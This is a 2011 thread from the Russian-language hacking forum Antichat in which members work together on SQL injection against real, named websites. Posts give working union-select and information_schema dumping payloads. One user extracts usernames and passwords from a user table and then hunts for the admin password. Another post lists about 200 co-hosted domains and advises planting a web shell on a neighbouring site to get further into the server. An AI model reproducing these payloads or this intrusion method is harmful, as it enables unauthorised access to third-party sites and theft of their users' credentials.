ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.06.2011, 01:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
54576
Репутация:
8
|
|
Sql injection на Sybase кто нибудь пробивал?
|
|
|
|
22.06.2011, 01:44
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от M_script
M_script said:
попугай
, ошибся.
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+from
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+/*from*/
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+frm
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+/*frm*/
upd:
http://notice.spacash.com/2257.php?id=-2902/*select+*//*from*/
Точно, фильтруется from. Только как то избирательно.
http://notice.spacash.com/2257.php?id=2902+from
|
|
|
22.06.2011, 02:32
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от попугай
попугай said:
Точно, фильтруется from. Только как то избирательно.
Фильтруется, если между "select " и "from" есть любой символ.
|
|
|
|
22.06.2011, 08:15
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Есть скуля в поиске, но никак не получается составить истинное выражение для правильного вывода.
Думал что так пройдёт, но всё равно тоже ругается
Код:
Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=12'+and+'1'='('1
UPD Для обрезки запроса только ядовитые нули помогают, но запрос всё равно остаётся ложным
Код:
Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=12'+and+'1'='1%00
|
|
|
|
22.06.2011, 10:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от BigBear
BigBear said:
Есть скуля в поиске, но никак не получается составить истинное выражение для правильного вывода.
Думал что так пройдёт, но всё равно тоже ругается
Код:
Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=12'+and+'1'='('1
UPD Для обрезки запроса только ядовитые нули помогают, но запрос всё равно остаётся ложным
Код:
Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=12'+and+'1'='1%00
Так хорошо задал вопрос, и так нелепо упустил скобку во внимании
Код:
Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6,7,8)--+1
|
|
|
|
22.06.2011, 13:06
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Expl0ited
Expl0ited said:
Так хорошо задал вопрос, и так нелепо упустил скобку во внимании
Код:
Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6,7,8)--+1
Огромное спасибо, разобрался.
Единственная проблема - данные из userlist не подходят для админки
Код:
Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(2),3,4,concat_ws(0x3a,user,pass),6,7,8+from+userlist+limit+0,1)--+1
А Админка тут
Код:
Code:
http://sport-razgrom.ru/admin
Где ещё помимо мускула может лежать пасс от админки ?
|
|
|
|
22.06.2011, 13:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Может быть банальная проверка
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
[upd] да там бейсик авторизация, пароль хранится в файле. |
|
|
|
22.06.2011, 13:27
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Печально. Обломался шелл значит.
|
|
|
|
22.06.2011, 13:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от BigBear
BigBear said:
Печально. Обломался шелл значит.
Вообщем, если тебе ну очень интересно повысить свои права до веб-шелла на этом ресурсе, то я бы на твоем месте не расстраивался, а искал дальше. Тем более, что на сервере, по реверсу еще порядка 200 сайтов, на одном из них уж точно можно будет залиться, а действовать локально часто более результативно, чем извне.
Вот списочек сайтов:
Код:
Code:
segway-city.ru
www.abcde.by
www.germida.com
www.sjp.su
gay-country.ru
www.vashyprava.ru
zaschita.name
agnivo.ru
www.samara777.ru
tpgrad.ru
www.zazerye.by
www.zaitsevmedia.ru
www.gualcolors.ru
www.podaroknebes.ru
af-school.ru
bookfeel.ru
www.stylish-stuff.ru
asgardstudio.ru
igroson.ru
rubezh-kaluga.ru
skottishfold.ru
lostidea.ru
mobilaport.ru
www.farwel.ru
pos-reklama.ru
servers-saintp.ru
honda-electric.ru
vabene-mobili.ru
www.server-life.ru
games4pro.com
www.akva-dv.ru
www.avtovek73.ru
mebelshik-msk.ru
www.realborneo.ru
www.photoka.info
www.violetta.su
www.ymuhin.ru
it-otdel.org
shko-la.ru
www.26-it.ru
cookerblog.ru
charter-vip.com
zdphoto.ru
www.mobport.ru
citymotors.ru
www.kamerton-realty.ru
adventure-team.pro
21antenna.ru
cleanprint.ru
www.air-industry.ru
proactive-capital.com
worldlegend.ru
www.kanca.ru
insideinform.ru
salon-flamingo.ru
agspec.ru
3d.globatek.ru
ru925.ru
smerchserver.ru
www.catportal.ru
www.zhostovo.com
www.edinstwo.ru
mardanov.info
zadelkin.ru
www.uralteploservis.ru
tronlegacy.biz
www.turist-vodnik.ru
oletta.ru
pfiff.ru
stolnikov-motors.ru
www.belwebdesign.com
parketmoskva.ru
doskarus.ru
www.lingvoprofessional.ru
www.rosstroy.me
www.baki-n.ru
ibfd-fund.com
barnaulkapstroy.ru
www.kuzaluplast.ru
shtuchkipro.ru
www.openeyes.ru
ribak-ribaka.ru
nnbuyback.com
belayagora.info
el-svoboda.ru
vash-shans.com
forum.servers-saintp.ru
mertix.ru
domenhost.com
forex-grail.ru
www.unplate.com
www.it-26.ru
eucvot.net
imagophoto.ru
pizza-stavropol.ru
1seconds.ru
www.masterfreetzi.ru
www.diezel-truck.ru
topatulyashuz.ru
www.mt-m.ru
chidori-profit.com
predict1on.ru
www.exclusive-st.ru
www.kenotrontv.ru
www.stroyteploservis.ru
www.fmr.su
apple-star-films.com
svetoart.ru
filnauki.ru
ekhb.ru
kopeikina.com
www.yafanatkino.ru
dentolife.ru
www.megapechi.ru
mosarte.ru
www.probro.ru
76yar.ru
100lotov.ru
vivadizain.ru
answers-mail1.ru
www.alkonomsk.ru
www.blogogolik.ru
www.piercer.ru
www.relaxtea.ru
mebel-stavropol.ru
www.flyfishka.ru
medspravka24.com
dentime.ru
нейроклуб.рф
margo.cc
www.1alfa.ru
pelmen.org
www.russlines.ru
forexbc.ru
iportugal.ru
mobila51.com
special4kids.ru
www.doctor-stapel.ru
www.denapak.ru
jantars.ru
mosivphotos.com
tur-topik.ru
hstars.ru
sport-razgrom.ru
lazarevo43.ru
www.bostoncar.ru
www.sabahtea.ru
www.trawka.ru
donysoft.com
avtoremontes.ru
bestwax.ru
artkadr.ru
buhvolga.ru
школа-40.рф
selo-zavetnoe.ru
armada-forward.com
proficom.org
www.turpoisk-kaluga.ru
dress2.ru
tg-marka.ru
www.gce42.ru
mary-care.ru
www.discprint.ru
xx76.ru
kaluga-electro.ru
www.livedoors.ru
bigreferat.ru
borodina-diet.ru
torti.uz
auditenergo.com
www.housecomplect.ru
www.yam-mebel.ru
stroikapro.com
www.baikalboat.com
picimage.ru
rimtermy.ru
doma1ns.ru
gachirkov.com
gercules.com
burointerior.com
www.tesk72.ru
universepw.ru
moiorigami.ru
imdi.ru
yurikoff.com
www.kolgotki-belie.ru
artidelo.ru
www.stopholod.ru
www.otel89.ru
agrohimsnab.ru
rabobo.ru
planmytrip.ru
www.la2galaxy.ru
inflat.ru
sexperts.ru
arshu.ru
salongavrosh.ru
best4girls.ru
forex-rts.ru
cards2.ru
www.avto-instrument.net
legalka-tver.ru
moivyshivki.ru
fotolok.ru
Сервак конечно не порутается, т.к.:
Код:
Code:
Linux server18.hosting.reg.ru 2.6.26-2-amd64 #1 SMP Tue Jan 25 05:59:43 UTC 2011 x86_64
Но можно надеяться на криво-выставленные права, бэкапы, забытый .bash_history, бажный демон или еще какую вкусняшку.
|
|
|
|
22.06.2011, 14:55
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Да я искал уже. Проблема в том, что хостинг сразу предлагает предустановленные движки аля джумла или вордпресс, ессно пропатченные.
Редко кто юзает самопис.
А те кто юзает, админки не держат ибо почти везде html.
Редко где самопис на пхп, да и админки не везде.
Вот один из сайтов в списке.
Код:
Code:
http://100lotov.ru/objects.php?type=3+and+1=2+union+select+1,concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
